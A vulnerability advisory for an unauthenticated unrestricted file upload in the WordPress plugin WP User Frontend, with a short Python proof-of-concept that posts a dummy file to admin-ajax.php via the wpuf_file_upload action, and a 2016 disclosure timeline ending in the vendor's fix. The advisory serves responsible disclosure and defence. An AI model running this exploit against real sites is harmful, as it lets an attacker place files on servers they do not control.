WP User Frontend [Unrestricted File Upload]

WP User Frontend plugin for WordPress suffers from a Unrestricted File Upload vulnerability

Description

WordPress plugin WP User Frontend suffers from an unrestricted file upload vulnerability. An attacker can exploit the wpuf_file_upload or wpuf_insert_image actions to upload any file which pass the WordPress mime and size checks.

The attack does not require any privilege to be performed. The mentioned actions are available to non-privileged users also, thus allowing to anyone uploading files to the web server.

PoC

#!/usr/bin/python3

################################################################################
# WP User Frontend unrestricted file upload exploit
#
# Author: Panagiotis Vagenas <pan.vagenas@gmail.com>
################################################################################

import requests
import tempfile

url = 'http://example.com/wp-admin/admin-ajax.php'

postData = {
    'action': 'wpuf_file_upload'
}

file = tempfile.NamedTemporaryFile(mode='a+t', suffix='.jpeg')

file.write('A'*32)

file.seek(0)

files = {'wpuf_file': file}

r = requests.post(url, data=postData, files=files)

file.close()

if r.text != 'error':
    print('Success!')
    print(r.text)
else:
    print('error')

exit(0)


WordPress Plugins Unrestricted File Upload
INFO
TIMELINE
  • 2016-02-04:
    Vendor notified via support forums in WordPress.org
  • 2016-02-05:
    Vendor responded
  • 2016-02-05:
    Issue details send to vendor
  • 2016-02-06:
    Requested CVE ID
  • 2016-02-06:
    Vendor implemented security checks
  • 2016-02-06:
    Verified that this exploit is no longer valid
  • 2016-02-08:
    Vendor released v2.3.11 which resolves this issue